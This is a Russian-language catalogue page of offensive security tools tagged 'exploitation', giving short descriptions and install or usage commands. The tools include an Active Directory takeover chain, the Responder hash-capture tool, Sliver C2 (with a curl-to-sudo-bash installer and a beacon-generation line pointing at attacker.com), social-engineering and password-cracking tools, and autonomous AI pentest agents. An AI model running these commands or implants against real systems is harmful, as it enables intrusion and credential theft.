Каталог инструментов

111 инструментов

Тег: exploitation ×
Exploitation

PowerShell-инструмент, реализующий цепочку атаки CVE-2026-27912 для захвата домена Active Directory через злоупотребление UPN.

git clone https://github.com/Semperis-Community/ResetNightmare.git cd ResetNightmare . .\ResetNightmare.ps1

Responder

v3.2.2.0
Exploitation

Инструмент для атак на протоколы LLMNR, NBT-NS и MDNS во внутренних сетях. Поднимает поддельные сервисы (SMB, HTTP, LDAP, FTP, MSSQL и др.) и перехватывает NTLMv1/v2 хеши при обращении …

# Kali Linux (предустановлен) responder -h # Из исходников git clone https://github.com/lgandx/Responder cd Responder python Responder.py -I eth0 -rdwv # Зависимости pip install netifaces
Блог

Riftor

v4.1.1
Exploitation

ИИ-агент для баг-хантинга и пентеста с 350+ навыками, параллельными воркерами, MCP-инструментами и построением графа атак в терминале

pip install riftor pip install 'riftor[browser]' export ANTHROPIC_API_KEY=sk-ant-... riftor riftor --config riftor --version riftor --model openai/gpt-4o riftor --worker-model anthropic/claude-haiku-4-5-20251001 riftor --workdir ./engagement riftor --scope-file scope.txt riftor -p "enumerate 10.0.0.5" riftor --doctor git clone https://github.com/Estudely/riftor && cd riftor uv sync && uv run riftor docker build -t riftor . docker run -it --rm -e ANTHROPIC_API_KEY -v "$PWD:/work" riftor

Rogue

Exploitation

AI-агент для тестирования безопасности, использующий LLM для интеллектуального обнаружения и подтверждения уязвимостей веб-приложений.

git clone https://github.com/faizann24/rogue cd rogue pip install -r requirements.txt

SPAF

Exploitation

AI-фреймворк наступательной безопасности, автоматизирующий разведку, сопоставление CVE и генерацию proof-of-concept эксплойтов с использованием различных LLM-провайдеров.

git clone https://github.com/geevarghesekthomas84-sys/spaf.git cd spaf python -m venv venv source venv/bin/activate pip install -r requirements.txt pip install -e . spaf --install-completion spaf setup

Semgrep

v1.171.0
Exploitation

Молниеносный статический анализатор кода с человекочитаемым синтаксисом правил (похож на сам код, а не на regex): находит реальные уязвимости и антипаттерны в десятках языков за секунды на кодовых …

# pipx (рекомендуется) pipx install semgrep # Homebrew (macOS/Linux) brew install semgrep # pip (в virtualenv) pip install semgrep semgrep --config auto /path/to/code semgrep --config "p/security-audit" .

Shannon

Exploitation

Автономный white-box AI-пентестер для веб-приложений и API, который анализирует исходный код, выявляет векторы атак и выполняет реальные эксплойты для подтверждения уязвимостей перед продакшеном.

npx @keygraph/shannon setup npx @keygraph/shannon start -u https://your-app.com -r /path/to/your-repo

ShieldGrid

vlatest
Exploitation

Фреймворк для симуляции сетевого сканирования, lateral movement и злоупотребления протоколами в среде тестирования безопасности.

—

Sliver

v1.7.3
Exploitation

Современный open source C2-фреймворк от BishopFox. Альтернатива Cobalt Strike и Metasploit для red team операций. Поддерживает несколько транспортных протоколов и генерацию имплантов. Возможности: - Импланты под Windows, Linux, …

# Скачать бинарь сервера: # https://github.com/BishopFox/sliver/releases # Linux (быстрый старт): curl https://sliver.sh/install | sudo bash # Запустить сервер: sudo sliver-server # В консоли Sliver: # Создать имплант (beacon): generate beacon --mtls attacker.com --os windows --arch amd64 # Запустить listener: mtls # Ждать подключения: beacons use <beacon-id> ls / whoami / shell
Exploitation

SET — комплексный фреймворк для атак социальной инженерии. Включает Spear-Phishing, веб-атаки (credential harvesting, tabnabbing), создание вредоносных payload-ов, SMS-спуфинг и QR-код атаки. Входит в Kali Linux.

# Kali Linux (предустановлен): sudo setoolkit # Установка из исходников: git clone https://github.com/trustedsec/social-engineer-toolkit cd social-engineer-toolkit pip3 install -r requirements.txt sudo python3 setoolkit

Steghide

Exploitation

Классический инструмент для скрытия данных в изображениях и аудиофайлах (JPEG, BMP, WAV, AU). Использует шифрование AES-128. Поддерживает извлечение скрытых данных. Широко используется в CTF и изучении стеганографии.

# Kali Linux / Ubuntu: sudo apt install steghide # Скрыть файл в изображении: steghide embed -cf cover.jpg -sf secret.txt steghide embed -cf cover.jpg -sf secret.txt -p "password" # Извлечь: steghide extract -sf cover.jpg steghide extract -sf cover.jpg -p "password" # Получить информацию без пароля: steghide info cover.jpg

Stegseek

v0.6
Exploitation

Молниеносный брутфорс паролей для Steghide: проверяет 1+ млрд слов в секунду благодаря многопоточности и ранней обрезке неверных путей. Умеет автоматически извлекать данные без указания пароля при успешном взломе. …

# Скачать .deb-пакет: # https://github.com/RickdeJager/stegseek/releases sudo dpkg -i stegseek_*.deb # Или из исходников: git clone https://github.com/RickdeJager/stegseek cd stegseek && mkdir build && cd build cmake .. && make && sudo make install # Брутфорс с wordlist (синтаксис: stegseek [файл] [wordlist] [вывод]): stegseek cover.jpg /usr/share/wordlists/rockyou.txt stegseek cover.jpg rockyou.txt extracted.txt # Только проверка (без извлечения): stegseek --info cover.jpg